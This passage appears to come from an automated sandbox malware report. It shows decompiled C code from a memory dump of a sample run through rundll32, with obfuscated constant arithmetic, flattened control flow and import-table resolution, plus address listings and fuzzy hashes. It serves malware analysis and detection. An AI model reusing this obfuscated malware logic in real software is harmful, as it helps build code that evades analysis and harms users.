				_v68 = _v68 ^ 0x0001eb63;
				_v76 = 0x5a4023;
				_v76 = _v76 >> 0xf;
				_t157 = 0x5b;
				_v76 = _v76 * 0x13;
				_v76 = _v76 ^ 0x64c481b8;
				_v76 = _v76 ^ 0x64ccd277;
				_v64 = 0xe36df4;
				_v64 = _v64 / _t157;
				_t158 = 9;
				_v64 = _v64 * 0x52;
				_v64 = _v64 ^ 0x00c8b522;
				_v80 = 0x952e3b;
				_v80 = _v80 >> 6;
				_v80 = _v80 ^ 0xc023484e;
				_v80 = _v80 / _t158;
				_v80 = _v80 ^ 0x155df6ec;
				_v72 = 0x4bfcfc;
				_v72 = _v72 | 0x0a339af0;
				_v72 = _v72 << 0xf;
				_t159 = 0x12;
				_v72 = _v72 / _t159;
				_v72 = _v72 ^ 0x0e3e5ce5;
				_v40 = 0xc0630c;
				_v40 = _v40 | 0x5d0d844d;
				_v40 = _v40 ^ 0x5dc4e99c;
				_v52 = 0x98b7b;
				_v52 = _v52 + 0xa105;
				_v52 = _v52 >> 5;
				_v52 = _v52 ^ 0x0004c78d;
				_v56 = 0xd0814a;
				_v56 = _v56 >> 9;
				_v56 = _v56 * 0x3e;
				_v56 = _v56 ^ 0x001a31dc;
				_v60 = 0xb9e1cb;
				_v60 = _v60 * 0x25;
				_v60 = _v60 << 0xa;
				_v60 = _v60 ^ 0x768204a8;
				_v48 = 0xccd34a;
				_v48 = _v48 + 0xffff20ce;
				_v48 = _v48 ^ 0x00ce4dff;
				do {
					while(_t137 != 0x8f26e2d) {
						if(_t137 == 0xc99b7e9) {
							_t137 = 0x8f26e2d;
							continue;
						} else {
							if(_t137 != 0xfe1ef29) {
								goto L10;
							} else {
								_t133 =  *0x353dfc; // 0x0
								E0034E274(_v72, _v40, _t137,  *_t135,  *((intOrPtr*)(_t135 + 4)), _v44, _v52, _v56, _v60, _t137,  *((intOrPtr*)(_t133 + 0x40)), _v48,  &_v36);
								_t155 =  ==  ? 1 : _t155;
							}
						}
						L5:
						return _t155;
					}
					_push( *_t154);
					_t130 = E0034AE6D(_v76,  &_v36,  *((intOrPtr*)(_t154 + 4)), _v64, _t137, _v80);
					_t162 = _t162 + 0x14;
					if(_t130 == 0) {
						_t137 = 0xeaa5f76;
						goto L10;
					} else {
						_t137 = 0xfe1ef29;
						continue;
					}
					goto L5;
					L10:
				} while (_t137 != 0xeaa5f76);
				goto L5;
			}



























                                                                                                                    0x0033aeff
                                                                                                                    0x0033af06
                                                                                                                    0x0033af0a
                                                                                                                    0x0033af0c
                                                                                                                    0x0033af0d
                                                                                                                    0x0033af11
                                                                                                                    0x0033af15
                                                                                                                    0x0033af16
                                                                                                                    0x0033af17
                                                                                                                    0x0033af1c
                                                                                                                    0x0033af24
                                                                                                                    0x0033af27
                                                                                                                    0x0033af31
                                                                                                                    0x0033af39
                                                                                                                    0x0033af3b
                                                                                                                    0x0033af43
                                                                                                                    0x0033af48
                                                                                                                    0x0033af4d
                                                                                                                    0x0033af58
                                                                                                                    0x0033af5d
                                                                                                                    0x0033af63
                                                                                                                    0x0033af6b
                                                                                                                    0x0033af73
                                                                                                                    0x0033af7d
                                                                                                                    0x0033af80
                                                                                                                    0x0033af84
                                                                                                                    0x0033af8c
                                                                                                                    0x0033af94
                                                                                                                    0x0033afa4
                                                                                                                    0x0033afad
                                                                                                                    0x0033afb0
                                                                                                                    0x0033afb4
                                                                                                                    0x0033afbc
                                                                                                                    0x0033afc4
                                                                                                                    0x0033afc9
                                                                                                                    0x0033afd9
                                                                                                                    0x0033afdd
                                                                                                                    0x0033afe5
                                                                                                                    0x0033afed
                                                                                                                    0x0033aff5
                                                                                                                    0x0033affe
                                                                                                                    0x0033b001
                                                                                                                    0x0033b005
                                                                                                                    0x0033b00d
                                                                                                                    0x0033b015
                                                                                                                    0x0033b01d
                                                                                                                    0x0033b025
                                                                                                                    0x0033b02d
                                                                                                                    0x0033b035
                                                                                                                    0x0033b03a
                                                                                                                    0x0033b042
                                                                                                                    0x0033b04a
                                                                                                                    0x0033b054
                                                                                                                    0x0033b058
                                                                                                                    0x0033b060
                                                                                                                    0x0033b06d
                                                                                                                    0x0033b071
                                                                                                                    0x0033b076
                                                                                                                    0x0033b083
                                                                                                                    0x0033b08b
                                                                                                                    0x0033b093
                                                                                                                    0x0033b09b
                                                                                                                    0x0033b09b
                                                                                                                    0x0033b0a5
                                                                                                                    0x0033b101
                                                                                                                    0x00000000
                                                                                                                    0x0033b0a7
                                                                                                                    0x0033b0ad
                                                                                                                    0x00000000
                                                                                                                    0x0033b0b3
                                                                                                                    0x0033b0bc
                                                                                                                    0x0033b0e3
                                                                                                                    0x0033b0f4
                                                                                                                    0x0033b0f4
                                                                                                                    0x0033b0ad
                                                                                                                    0x0033b0f8
                                                                                                                    0x0033b100
                                                                                                                    0x0033b100
                                                                                                                    0x0033b105
                                                                                                                    0x0033b11b
                                                                                                                    0x0033b120
                                                                                                                    0x0033b125
                                                                                                                    0x0033b131
                                                                                                                    0x00000000
                                                                                                                    0x0033b127
                                                                                                                    0x0033b127
                                                                                                                    0x00000000
                                                                                                                    0x0033b127
                                                                                                                    0x00000000
                                                                                                                    0x0033b136
                                                                                                                    0x0033b136
                                                                                                                    0x00000000

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: #@Z$_`
                                                                                                                    • API String ID: 0-2586238014
                                                                                                                    • Opcode ID: 53fd34952857044f453416dfe1c2296bea2076e1f1d3fbb83fb98a566e4aede1
                                                                                                                    • Instruction ID: 4e340844caaaa48466a465d3bea306b20585c2b517594406a72c1c0c3836f43a
                                                                                                                    • Opcode Fuzzy Hash: 53fd34952857044f453416dfe1c2296bea2076e1f1d3fbb83fb98a566e4aede1
                                                                                                                    • Instruction Fuzzy Hash: 7B5135715083009FC759CF22C88681BFBE5FBC8758F509A1DF6969A220C372DA49CF46
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0033DFF3 Relevance: 2.6, Strings: 2, Instructions: 135COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 96%
                                                                                                                    			E0033DFF3() {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _t128;
				intOrPtr _t131;
				signed int _t133;
				signed int _t134;
				intOrPtr _t135;
				void* _t143;
				void* _t146;
				signed int* _t148;

				_t148 =  &_v52;
				_v12 = 0xa1a716;
				_v12 = _v12 + 0x2188;
				_v12 = _v12 ^ 0x00a02056;
				_v32 = 0x472a3;
				_v32 = _v32 + 0x22e5;
				_v32 = _v32 ^ 0xff9fab52;
				_v32 = _v32 ^ 0xff9c5b0a;
				_v48 = 0x9a7516;
				_v48 = _v48 + 0xffff4702;
				_v48 = _v48 * 0x45;
				_v48 = _v48 + 0xffff2ff5;
				_t146 = 0x4903f33;
				_v48 = _v48 ^ 0x296ff1ed;
				_v16 = 0xfa3b71;
				_v16 = _v16 << 9;
				_v16 = _v16 ^ 0xf47f6bba;
				_v20 = 0xc0b9b;
				_t133 = 0x7b;
				_v20 = _v20 * 0x52;
				_v20 = _v20 ^ 0x03d2ca7d;
				_v36 = 0x400b3e;
				_v36 = _v36 ^ 0xba288636;
				_v36 = _v36 ^ 0xc4c376ba;
				_v36 = _v36 ^ 0x7eaacb92;
				_v52 = 0x3419b2;
				_v52 = _v52 / _t133;
				_v52 = _v52 >> 0xc;
				_v52 = _v52 | 0xcef26f8a;
				_v52 = _v52 ^ 0xcef1d6cf;
				_v4 = 0xb26f64;
				_t134 = 3;
				_v4 = _v4 / _t134;
				_v4 = _v4 ^ 0x003ff5cc;
				_v40 = 0x34a33d;
				_v40 = _v40 >> 4;
				_v40 = _v40 ^ 0xd21b54bd;
				_v40 = _v40 ^ 0x33ae4ce0;
				_v40 = _v40 ^ 0xe1b00bb7;
				_v8 = 0x4c76b4;
				_v8 = _v8 << 2;
				_v8 = _v8 ^ 0x013e4034;
				_v24 = 0x1c9e42;
				_v24 = _v24 ^ 0x4f10b4b5;
				_v24 = _v24 << 4;
				_v24 = _v24 ^ 0xf0cd9088;
				_v44 = 0xfe69b1;
				_v44 = _v44 >> 0xd;
				_v44 = _v44 * 0x49;
				_v44 = _v44 * 0x7d;
				_v44 = _v44 ^ 0x011db47c;
				_v28 = 0x46ec28;
				_v28 = _v28 << 9;
				_v28 = _v28 * 0x58;
				_v28 = _v28 ^ 0xc2551a85;
				_t135 =  *0x353e0c; // 0x0
				do {
					while(_t146 != 0x4903f33) {
						if(_t146 == 0x6f617aa) {
							_t128 = E003346BE(_t135, _v4, _t135, _v40, _t135, _v8, _v24, _v44, _t135, 0, E003381B7, _v28);
							_t135 =  *0x353e0c; // 0x0
							 *((intOrPtr*)(_t135 + 0x10)) = _t128;
						} else {
							if(_t146 != 0xc69f0b3) {
								goto L6;
							} else {
								_t131 = E00337AF6(_v16, _t135, _v20, _t135, _v36, _t135, _v52);
								_t135 =  *0x353e0c; // 0x0
								_t148 =  &(_t148[6]);
								_t146 = 0x6f617aa;
								 *((intOrPtr*)(_t135 + 8)) = _t131;
								continue;
							}
						}
						L9:
						return 0 | _t135 != 0x00000000;
					}
					_push(_t135);
					_push(_t135);
					_t143 = 0x24;
					_t135 = E00337FF2(_t143);
					_t146 = 0xc69f0b3;
					 *0x353e0c = _t135;
					L6:
				} while (_t146 != 0xab42793);
				goto L9;
			}
























                                                                                                                    0x0033dff3
                                                                                                                    0x0033dff6
                                                                                                                    0x0033e000
                                                                                                                    0x0033e008
                                                                                                                    0x0033e010
                                                                                                                    0x0033e018
                                                                                                                    0x0033e020
                                                                                                                    0x0033e028
                                                                                                                    0x0033e030
                                                                                                                    0x0033e038
                                                                                                                    0x0033e049
                                                                                                                    0x0033e052
                                                                                                                    0x0033e05a
                                                                                                                    0x0033e05c
                                                                                                                    0x0033e069
                                                                                                                    0x0033e076
                                                                                                                    0x0033e07b
                                                                                                                    0x0033e083
                                                                                                                    0x0033e092
                                                                                                                    0x0033e095
                                                                                                                    0x0033e099
                                                                                                                    0x0033e0a1
                                                                                                                    0x0033e0a9
                                                                                                                    0x0033e0b1
                                                                                                                    0x0033e0b9
                                                                                                                    0x0033e0c1
                                                                                                                    0x0033e0d1
                                                                                                                    0x0033e0d5
                                                                                                                    0x0033e0da
                                                                                                                    0x0033e0e2
                                                                                                                    0x0033e0ea
                                                                                                                    0x0033e0f6
                                                                                                                    0x0033e0f9
                                                                                                                    0x0033e0fd
                                                                                                                    0x0033e105
                                                                                                                    0x0033e10d
                                                                                                                    0x0033e112
                                                                                                                    0x0033e11a
                                                                                                                    0x0033e122
                                                                                                                    0x0033e12a
                                                                                                                    0x0033e132
                                                                                                                    0x0033e137
                                                                                                                    0x0033e13f
                                                                                                                    0x0033e147
                                                                                                                    0x0033e14f
                                                                                                                    0x0033e154
                                                                                                                    0x0033e15c
                                                                                                                    0x0033e164
                                                                                                                    0x0033e16e
                                                                                                                    0x0033e177
                                                                                                                    0x0033e17b
                                                                                                                    0x0033e183
                                                                                                                    0x0033e18b
                                                                                                                    0x0033e195
                                                                                                                    0x0033e199
                                                                                                                    0x0033e1a1
                                                                                                                    0x0033e1a7
                                                                                                                    0x0033e1a7
                                                                                                                    0x0033e1ad
                                                                                                                    0x0033e229
                                                                                                                    0x0033e22e
                                                                                                                    0x0033e237
                                                                                                                    0x0033e1af
                                                                                                                    0x0033e1b1
                                                                                                                    0x00000000
                                                                                                                    0x0033e1b3
                                                                                                                    0x0033e1c6
                                                                                                                    0x0033e1cb
                                                                                                                    0x0033e1d1
                                                                                                                    0x0033e1d4
                                                                                                                    0x0033e1d6
                                                                                                                    0x00000000
                                                                                                                    0x0033e1d6
                                                                                                                    0x0033e1b1
                                                                                                                    0x0033e23b
                                                                                                                    0x0033e248
                                                                                                                    0x0033e248
                                                                                                                    0x0033e1e7
                                                                                                                    0x0033e1e8
                                                                                                                    0x0033e1eb
                                                                                                                    0x0033e1f3
                                                                                                                    0x0033e1f5
                                                                                                                    0x0033e1f7
                                                                                                                    0x0033e1fd
                                                                                                                    0x0033e1fd
                                                                                                                    0x00000000

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: (F$"
                                                                                                                    • API String ID: 0-1034852068
                                                                                                                    • Opcode ID: 38a1198c4fee8ae2d1e2d713ebf0b527a02ebc434f01c0f53c27bc838593f8d0
                                                                                                                    • Instruction ID: ae5c9dd4d891006aae96af09c0ac221728c77cd78301d7e7043f0fa72cf1199b
                                                                                                                    • Opcode Fuzzy Hash: 38a1198c4fee8ae2d1e2d713ebf0b527a02ebc434f01c0f53c27bc838593f8d0
                                                                                                                    • Instruction Fuzzy Hash: 395134724093019FC359CF25D98A80FBBE1EBD4758F108A1DF595AA260D3B1DA09CF87
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00337C37 Relevance: 2.6, Strings: 2, Instructions: 122COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 92%
                                                                                                                    			E00337C37(void* __ecx, void* __edx) {
				void* _t91;
				void* _t102;
				signed short _t108;
				signed short _t111;
				signed short _t113;
				signed int _t115;
				signed int _t116;
				signed int _t117;
				signed short _t121;
				intOrPtr _t128;
				signed short* _t132;
				signed short _t133;
				intOrPtr _t134;
				void* _t135;
				void* _t136;

				_t134 =  *((intOrPtr*)(_t135 + 0x30));
				_push(_t134);
				_push( *((intOrPtr*)(_t135 + 0x38)));
				_push( *((intOrPtr*)(_t135 + 0x38)));
				_push(__edx);
				_push(__ecx);
				E003420B9(_t91);
				 *((intOrPtr*)(_t135 + 0x2c)) = 0x3628ac;
				_t136 = _t135 + 0x14;
				 *(_t136 + 0x18) =  *(_t136 + 0x18) + 0xfffff240;
				_t115 = 0x47;
				 *(_t136 + 0x1c) =  *(_t136 + 0x18) * 0x5d;
				 *(_t136 + 0x1c) =  *(_t136 + 0x1c) ^ 0x13a7c7bd;
				 *(_t136 + 0x28) = 0x411077;
				 *(_t136 + 0x28) =  *(_t136 + 0x28) / _t115;
				 *(_t136 + 0x28) =  *(_t136 + 0x28) ^ 0x0001576b;
				 *(_t136 + 0x14) = 0x6ab109;
				 *(_t136 + 0x14) =  *(_t136 + 0x14) | 0x4522ba60;
				 *(_t136 + 0x14) =  *(_t136 + 0x14) + 0x6e2e;
				 *(_t136 + 0x14) =  *(_t136 + 0x14) | 0x405c50e2;
				 *(_t136 + 0x14) =  *(_t136 + 0x14) ^ 0x45775e58;
				 *(_t136 + 0x3c) = 0x583f0;
				_t116 = 0x13;
				 *(_t136 + 0x38) =  *(_t136 + 0x3c) / _t116;
				 *(_t136 + 0x38) =  *(_t136 + 0x38) ^ 0xb139aa03;
				 *(_t136 + 0x38) =  *(_t136 + 0x38) * 0x57;
				 *(_t136 + 0x38) =  *(_t136 + 0x38) ^ 0x3aa1b70d;
				 *(_t136 + 0x28) = 0xeb6063;
				 *(_t136 + 0x28) =  *(_t136 + 0x28) >> 9;
				 *(_t136 + 0x28) =  *(_t136 + 0x28) ^ 0x000c5736;
				 *(_t136 + 0x20) = 0x8f08a1;
				 *(_t136 + 0x20) =  *(_t136 + 0x20) ^ 0x1f969638;
				 *(_t136 + 0x20) =  *(_t136 + 0x20) >> 2;
				 *(_t136 + 0x20) =  *(_t136 + 0x20) ^ 0x07c9f7a9;
				 *(_t136 + 0x1c) = 0x46d0e7;
				 *(_t136 + 0x1c) =  *(_t136 + 0x1c) >> 6;
				 *(_t136 + 0x1c) =  *(_t136 + 0x1c) * 0x16;
				 *(_t136 + 0x1c) =  *(_t136 + 0x1c) ^ 0x00141072;
				 *(_t136 + 0x14) = 0x9e0f5b;
				 *(_t136 + 0x14) =  *(_t136 + 0x14) * 0x61;
				 *(_t136 + 0x14) =  *(_t136 + 0x14) | 0x4163d75f;
				 *(_t136 + 0x14) =  *(_t136 + 0x14) << 6;
				 *(_t136 + 0x14) =  *(_t136 + 0x14) ^ 0xf8f2ab9c;
				_t117 =  *(_t136 + 0x18);
				_t102 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
				_t128 =  *((intOrPtr*)(_t102 + 0x78 + _t117 * 8));
				if(_t128 == 0 ||  *((intOrPtr*)(_t102 + 0x7c + _t117 * 8)) == 0) {
					L13:
					return 1;
				} else {
					_t133 = _t128 + _t134;
					while(1) {
						_t105 =  *((intOrPtr*)(_t133 + 0xc));
						if( *((intOrPtr*)(_t133 + 0xc)) == 0) {
							goto L13;
						}
						_t121 = E0034CADF( *((intOrPtr*)(_t136 + 0x2c)), _t105 + _t134,  *(_t136 + 0x14),  *(_t136 + 0x38));
						 *(_t136 + 0x18) = _t121;
						__eflags = _t121;
						if(_t121 == 0) {
							L15:
							return 0;
						}
						_t132 =  *_t133 + _t134;
						_t113 =  *((intOrPtr*)(_t133 + 0x10)) + _t134;
						while(1) {
							_t108 =  *_t132;
							__eflags = _t108;
							if(__eflags == 0) {
								break;
							}
							if(__eflags >= 0) {
								_t110 = _t108 + 2 + _t134;
								__eflags = _t108 + 2 + _t134;
							} else {
								_t110 = _t108 & 0x0000ffff;
							}
							_t111 = E00336CA0( *((intOrPtr*)(_t136 + 0x34)),  *((intOrPtr*)(_t136 + 0x2c)), _t110,  *((intOrPtr*)(_t136 + 0x24)),  *(_t136 + 0x18), _t121);
							_t136 = _t136 + 0x10;
							__eflags = _t111;
							if(_t111 == 0) {
								goto L15;
							} else {
								_t121 =  *(_t136 + 0x18);
								_t132 =  &(_t132[2]);
								 *_t113 = _t111;
								_t113 = _t113 + 4;
								__eflags = _t113;
								continue;
							}
						}
						_t133 = _t133 + 0x14;
						__eflags = _t133;
					}
					goto L13;
				}
			}


















                                                                                                                    0x00337c3c
                                                                                                                    0x00337c42
                                                                                                                    0x00337c43
                                                                                                                    0x00337c47
                                                                                                                    0x00337c4b
                                                                                                                    0x00337c4c
                                                                                                                    0x00337c4d
                                                                                                                    0x00337c52
                                                                                                                    0x00337c5a
                                                                                                                    0x00337c5d
                                                                                                                    0x00337c6e
                                                                                                                    0x00337c71
                                                                                                                    0x00337c75
                                                                                                                    0x00337c7d
                                                                                                                    0x00337c8d
                                                                                                                    0x00337c91
                                                                                                                    0x00337c99
                                                                                                                    0x00337ca1
                                                                                                                    0x00337ca9
                                                                                                                    0x00337cb1
                                                                                                                    0x00337cb9
                                                                                                                    0x00337cc1
                                                                                                                    0x00337ccd
                                                                                                                    0x00337cd0
                                                                                                                    0x00337cd4
                                                                                                                    0x00337ce1
                                                                                                                    0x00337ce5
                                                                                                                    0x00337ced
                                                                                                                    0x00337cf5
                                                                                                                    0x00337cfa
                                                                                                                    0x00337d02
                                                                                                                    0x00337d0a
                                                                                                                    0x00337d12
                                                                                                                    0x00337d17
                                                                                                                    0x00337d1f
                                                                                                                    0x00337d27
                                                                                                                    0x00337d31
                                                                                                                    0x00337d35
                                                                                                                    0x00337d3d
                                                                                                                    0x00337d4a
                                                                                                                    0x00337d4e
                                                                                                                    0x00337d56
                                                                                                                    0x00337d5b
                                                                                                                    0x00337d66
                                                                                                                    0x00337d6a
                                                                                                                    0x00337d6c
                                                                                                                    0x00337d72
                                                                                                                    0x00337df1
                                                                                                                    0x00000000
                                                                                                                    0x00337d7b
                                                                                                                    0x00337d7b
                                                                                                                    0x00337dea
                                                                                                                    0x00337dea
                                                                                                                    0x00337def
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00337d96
                                                                                                                    0x00337d98
                                                                                                                    0x00337d9c
                                                                                                                    0x00337d9e
                                                                                                                    0x00337dfc
                                                                                                                    0x00000000
                                                                                                                    0x00337dfc
                                                                                                                    0x00337da5
                                                                                                                    0x00337da7
                                                                                                                    0x00337de1
                                                                                                                    0x00337de1
                                                                                                                    0x00337de3
                                                                                                                    0x00337de5
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00337dab
                                                                                                                    0x00337db5
                                                                                                                    0x00337db5
                                                                                                                    0x00337dad
                                                                                                                    0x00337dad
                                                                                                                    0x00337dad
                                                                                                                    0x00337dc9
                                                                                                                    0x00337dce
                                                                                                                    0x00337dd1
                                                                                                                    0x00337dd3
                                                                                                                    0x00000000
                                                                                                                    0x00337dd5
                                                                                                                    0x00337dd5
                                                                                                                    0x00337dd9
                                                                                                                    0x00337ddc
                                                                                                                    0x00337dde
                                                                                                                    0x00337dde
                                                                                                                    0x00000000
                                                                                                                    0x00337dde
                                                                                                                    0x00337dd3
                                                                                                                    0x00337de7
                                                                                                                    0x00337de7
                                                                                                                    0x00337de7
                                                                                                                    0x00000000
                                                                                                                    0x00337dea

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: X^wE$c`
                                                                                                                    • API String ID: 0-1321574684
                                                                                                                    • Opcode ID: 7e68209abe564a2167ede9e324bbe1b43f6973aa39a1b0bb2789b6df6e85ae44
                                                                                                                    • Instruction ID: 8130f64fd278a012894faf1a5d6a115ae4eede8bf31627ccee0c298a2b8a376f
                                                                                                                    • Opcode Fuzzy Hash: 7e68209abe564a2167ede9e324bbe1b43f6973aa39a1b0bb2789b6df6e85ae44
                                                                                                                    • Instruction Fuzzy Hash: 285184B15083029FC729DF24D88692BBBE1FFC4358F51891DF4869A221E371DA49CF96
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00334C5D Relevance: 2.6, Strings: 2, Instructions: 98COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 62%
                                                                                                                    			E00334C5D(intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				void* _t106;
				void* _t108;
				intOrPtr* _t109;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t128;

				_v44 = _v44 & 0x00000000;
				_v48 = 0xad4f7a;
				_v16 = 0xf18dbd;
				_v16 = _v16 + 0xffff4795;
				_v16 = _v16 << 0xe;
				_v16 = _v16 >> 6;
				_v16 = _v16 ^ 0x00dff17e;
				_v12 = 0xaf5949;
				_v12 = _v12 | 0xe2d389df;
				_v12 = _v12 + 0x286;
				_t112 = 3;
				_v12 = _v12 / _t112;
				_v12 = _v12 ^ 0x4ba32b72;
				_v24 = 0x2aefd1;
				_t113 = 0x7d;
				_t128 = _a4;
				_v24 = _v24 * 0x59;
				_v24 = _v24 << 2;
				_v24 = _v24 ^ 0x3bb9ca43;
				_v8 = 0x985427;
				_v8 = _v8 << 2;
				_v8 = _v8 ^ 0x713a2c3c;
				_v8 = _v8 | 0x45eb1ca3;
				_v8 = _v8 ^ 0x77f5f6d4;
				_v28 = 0xa7f2b4;
				_v28 = _v28 >> 0xc;
				_v28 = _v28 + 0x7e4a;
				_v28 = _v28 ^ 0x000cc7a8;
				_v40 = 0x7087c6;
				_t114 = 0x69;
				_v40 = _v40 / _t113;
				_v40 = _v40 ^ 0x00014835;
				_v20 = 0xcde00b;
				_v20 = _v20 + 0xffffcf30;
				_v20 = _v20 | 0xcdf6f1c4;
				_v20 = _v20 + 0xfc2b;
				_v20 = _v20 ^ 0xce0272c5;
				_v36 = 0x30875a;
				_v36 = _v36 * 0x47;
				_v36 = _v36 / _t114;
				_v36 = _v36 ^ 0x0028facf;
				_v32 = 0x6c449b;
				_v32 = _v32 >> 0xf;
				_v32 = _v32 + 0xffff12fc;
				_v32 = _v32 ^ 0xfff19483;
				_t106 =  *((intOrPtr*)(_t128 + 0x1c))( *((intOrPtr*)(_t128 + 0x38)), 1, 0);
				_t134 = _t106;
				if(_t106 != 0) {
					_push(_v8);
					_push(_v24);
					_push(_v12);
					_t108 = E00348606(_v16, 0x331378, _t134);
					_push(_v20);
					_t130 = _t108;
					_push(_t108);
					_push(_v40);
					_t109 = E0033CBDF(_v28,  *((intOrPtr*)(_t128 + 0x38)));
					if(_t109 != 0) {
						 *_t109();
					}
					E0033A8B0(_v36, _t130, _v32);
				}
				return 0;
			}





















                                                                                                                    0x00334c63
                                                                                                                    0x00334c69
                                                                                                                    0x00334c70
                                                                                                                    0x00334c77
                                                                                                                    0x00334c7e
                                                                                                                    0x00334c82
                                                                                                                    0x00334c86
                                                                                                                    0x00334c8d
                                                                                                                    0x00334c94
                                                                                                                    0x00334c9b
                                                                                                                    0x00334ca8
                                                                                                                    0x00334cad
                                                                                                                    0x00334cb2
                                                                                                                    0x00334cb9
                                                                                                                    0x00334cc4
                                                                                                                    0x00334cc7
                                                                                                                    0x00334cca
                                                                                                                    0x00334ccd
                                                                                                                    0x00334cd1
                                                                                                                    0x00334cd8
                                                                                                                    0x00334cdf
                                                                                                                    0x00334ce3
                                                                                                                    0x00334cea
                                                                                                                    0x00334cf1
                                                                                                                    0x00334cf8
                                                                                                                    0x00334cff
                                                                                                                    0x00334d03
                                                                                                                    0x00334d0a
                                                                                                                    0x00334d11
                                                                                                                    0x00334d1d
                                                                                                                    0x00334d1e
                                                                                                                    0x00334d23
                                                                                                                    0x00334d2a
                                                                                                                    0x00334d31
                                                                                                                    0x00334d38
                                                                                                                    0x00334d3f
                                                                                                                    0x00334d46
                                                                                                                    0x00334d4d
                                                                                                                    0x00334d5c
                                                                                                                    0x00334d64
                                                                                                                    0x00334d67
                                                                                                                    0x00334d6e
                                                                                                                    0x00334d75
                                                                                                                    0x00334d79
                                                                                                                    0x00334d80
                                                                                                                    0x00334d8a
                                                                                                                    0x00334d8d
                                                                                                                    0x00334d8f
                                                                                                                    0x00334d92
                                                                                                                    0x00334d9a
                                                                                                                    0x00334d9d
                                                                                                                    0x00334da3
                                                                                                                    0x00334da8
                                                                                                                    0x00334dab
                                                                                                                    0x00334dad
                                                                                                                    0x00334dae
                                                                                                                    0x00334db7
                                                                                                                    0x00334dc1
                                                                                                                    0x00334dc3
                                                                                                                    0x00334dc3
                                                                                                                    0x00334dcd
                                                                                                                    0x00334dd3
                                                                                                                    0x00334dda

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: <,:q$J~
                                                                                                                    • API String ID: 0-951887683
                                                                                                                    • Opcode ID: 21d075f10f7372cf25674df88019a020d4031dbba8e76a8736e13827971d6d00
                                                                                                                    • Instruction ID: 63a184c8cc057fecfe08bf8607757df252042c143b94fba62b499c41ee2a911b
                                                                                                                    • Opcode Fuzzy Hash: 21d075f10f7372cf25674df88019a020d4031dbba8e76a8736e13827971d6d00
                                                                                                                    • Instruction Fuzzy Hash: 4D411E71D0130AABDF49CFA1C94AAEEBBB1FB54314F208159D410BA2A0D7B51B55CFA4
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0033EE81 Relevance: 2.6, Strings: 2, Instructions: 95COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E0033EE81(void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				char _v44;
				short _v48;
				short _v52;
				intOrPtr _v56;
				char _v576;
				intOrPtr* _t95;
				signed int _t99;
				signed int _t100;

